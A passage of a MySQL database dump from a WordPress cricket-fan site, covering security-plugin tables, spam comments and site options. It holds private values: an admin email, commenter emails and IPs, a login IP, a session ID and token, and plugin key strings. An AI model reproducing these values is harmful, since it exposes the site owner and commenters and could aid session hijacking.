CREATE TABLE `wp_cerber_files` (
  `scan_id` int(10) unsigned NOT NULL,
  `scan_type` int(10) unsigned NOT NULL DEFAULT 1,
  `scan_mode` int(10) unsigned NOT NULL DEFAULT 0,
  `scan_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_name_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_name` text NOT NULL,
  `file_type` int(10) unsigned NOT NULL DEFAULT 0,
  `file_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_md5` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_hash_repo` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `hash_match` int(10) unsigned NOT NULL DEFAULT 0,
  `file_size` bigint(20) unsigned NOT NULL DEFAULT 0,
  `file_perms` int(11) NOT NULL DEFAULT 0,
  `file_writable` int(10) unsigned NOT NULL DEFAULT 0,
  `file_mtime` int(10) unsigned NOT NULL DEFAULT 0,
  `file_ext` varchar(255) NOT NULL DEFAULT '',
  `extra` text NOT NULL,
  PRIMARY KEY (`scan_id`,`file_name_hash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_files`
--

LOCK TABLES `wp_cerber_files` WRITE;
/*!40000 ALTER TABLE `wp_cerber_files` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_cerber_files` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_sets`
--

DROP TABLE IF EXISTS `wp_cerber_sets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_sets` (
  `the_key` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `the_id` bigint(20) NOT NULL DEFAULT 0,
  `the_value` longtext NOT NULL,
  `expires` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`the_key`,`the_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_sets`
--

LOCK TABLES `wp_cerber_sets` WRITE;
/*!40000 ALTER TABLE `wp_cerber_sets` DISABLE KEYS */;
INSERT INTO `wp_cerber_sets` VALUES ('admin_message',0,'a:4:{i:0;s:68:\"A new version of WP Cerber Security is available. Please install it.\";i:1;s:68:\"A new version of WP Cerber Security is available. Please install it.\";i:2;s:68:\"A new version of WP Cerber Security is available. Please install it.\";i:3;s:68:\"A new version of WP Cerber Security is available. Please install it.\";}',0),('admin_notice',0,'a:0:{}',0),('boot_cerber_addons',0,'a:0:{}',0),('cerber_admin_wide',0,'<h2>WP Cerber is now active and has started protecting your site</h2><p style=\"font-size:130%;\"><a href=\"https://wpcerber.com/getting-started/\" target=\"_blank\">Getting Started Guide</a></p><div id=\"crb-activation-msg\"><p> <i class=\"crb-icon crb-icon-bx-layer\"></i> <a href=\"https://yorkshirecricketboard.org.uk/wp-admin/admin.php?page=cerber-tools&amp;tab=imex\">Import settings</a> <i class=\"crb-icon dashicons-before dashicons-twitter\"></i> <a target=\"_blank\" href=\"https://twitter.com/wpcerber\">Follow Cerber on Twitter</a> <i class=\"crb-icon dashicons-before dashicons-email-alt\"></i> <a target=\"_blank\" href=\"https://wpcerber.com/subscribe-newsletter/\">Subscribe to Cerber\'s newsletter</a></p></div>',0),('cerber_user',1,'a:2:{s:10:\"last_login\";a:2:{s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:40:\"0c3c442ba67c66fa3227e09aeb8c763c79676604\";}s:11:\"2fa_history\";a:2:{i:0;i:1;i:1;i:1649680628;}}',0),('garbage_collector',0,'1675210614',0),('refresh_add_on_list',0,'0',0),('_background_tasks',0,'a:0:{}',0),('_cerberkey_',0,'a:3:{i:0;s:32:\"1a6def3e71613a931f6db37855adc207\";i:1;i:1624623692;i:4;s:40:\"SK//U3EBFJSPWIZ7VQ1NO2RG69DY45XLKTC0A8HM\";}',0),('_cerber_mnemosyne',0,'a:3:{i:2;s:20:\"58RQETOV09NPXK7HY2IC\";i:4;i:6;i:6;s:18:\"U381HTOGCD40ENI9JS\";}',0);
/*!40000 ALTER TABLE `wp_cerber_sets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_uss`
--

DROP TABLE IF EXISTS `wp_cerber_uss`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_uss` (
  `user_id` bigint(20) unsigned NOT NULL,
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `started` int(10) unsigned NOT NULL,
  `expires` int(10) unsigned NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `wp_session_token` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_uss`
--

LOCK TABLES `wp_cerber_uss` WRITE;
/*!40000 ALTER TABLE `wp_cerber_uss` DISABLE KEYS */;
INSERT INTO `wp_cerber_uss` VALUES (1,'185.175.113.72','',1649680628,1649853428,'v6EVazR3Ig9cdoH10eOwYtMi','0352f2936f68d9150a63b51f352b471a83befece95dc3d893aa95e56aaa53d28');
/*!40000 ALTER TABLE `wp_cerber_uss` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
INSERT INTO `wp_comments` VALUES (2,0,'','','','165.231.164.108','2017-01-13 14:59:11','2017-01-13 14:59:11','',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50','comment',0,0),(3,1,'breakingnews','juliussalo@gmail.com','http://thesoccervoice.com/groups/reviews-of-the-new-smartphones/','107.173.6.2','2017-02-16 17:37:58','2017-02-16 17:37:58','New apps can also make սse of 1024-RSA certificates,\r\nbut only if they are manufactսred wіth the beta contained iin that same bⅼog post.',0,'spam','Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0','comment',0,0),(4,1,'ig','luis.binder@gmail.com','http://www.feedbooks.com/user/3269475/profile','107.173.167.93','2017-02-22 22:05:34','2017-02-22 22:05:34','Hey there! Quick question that\'s entirely \r\noff topic. Do you know how to make your site mobile friendly?\r\nMy web site looks weird when viewing from my iphone 4. I\'m trying \r\nto find a template or plugin that might be able to correct \r\nthis problem. If you have any recommendations, please share.\r\nMany thanks!',0,'spam','Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0','comment',0,0);
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_fw_termmeta`
--

DROP TABLE IF EXISTS `wp_fw_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_fw_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `fw_term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `fw_term_id` (`fw_term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_fw_termmeta`
--

LOCK TABLES `wp_fw_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_fw_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_fw_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=140612 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','https://yorkshirecricketboard.org.uk','yes'),(2,'home','https://yorkshirecricketboard.org.uk','yes'),(3,'blogname','Yorkshire Cricket Fans','yes'),(4,'blogdescription','Sharing Our Love for Cricket &amp; Other Sports','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','zoe.allen@vanillacircus.co.uk','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','','yes'),(11,'comments_notify','','no'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','closed','yes'),(20,'default_ping_status','closed','yes'),(21,'default_pingback_flag','','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','','yes'),(27,'moderation_notify','','yes'),(28,'permalink_structure','/%postname%','yes'),(29,'rewrite_rules','a:93:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(44,'comment_registration','','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','51917','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','posts','yes'),(54,'tag_base','','yes'),(55,'show_avatars','','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','1','yes'),(70,'close_comments_days_old','1','yes'),(71,'thread_comments','','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:4:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;i:4;a:0:{}i:5;a:4:{s:5:\"title\";s:9:\"Important\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}}','yes'),(79,'widget_text','a:6:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;i:3;a:3:{s:5:\"title\";s:8:\"Find Us:\";s:4:\"text\";s:49:\"<b> Bootham Row, York, North Yorkshire, YO30 </b>\";s:6:\"filter\";b:0;}i:4;a:3:{s:5:\"title\";s:8:\"Find Us:\";s:4:\"text\";s:49:\"<b> Bootham Row, York, North Yorkshire, YO30 </b>\";s:6:\"filter\";b:0;}i:5;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:353:\"<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2347.1338221423784!2d-1.09132848413815!3d53.964891280113385!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x487931a7555fbe0f%3A0x93c92b3c2f7f94f9!2sBootham%2C+York!5e0!3m2!1sen!2suk!4v1481902399936\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen></iframe>\";s:6:\"filter\";b:0;}i:6;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:464:\"            <a class=\"twitter-timeline\"  href=\"https://twitter.com/search?q=cricket\" data-widget-id=\"809783825249304576\">Tweets about cricket</a>\r\n            <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?\'http\':\'https\';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+\"://platform.twitter.com/widgets.js\";fjs.parentNode.insertBefore(js,fjs);}}(document,\"script\",\"twitter-wjs\");</script>\r\n          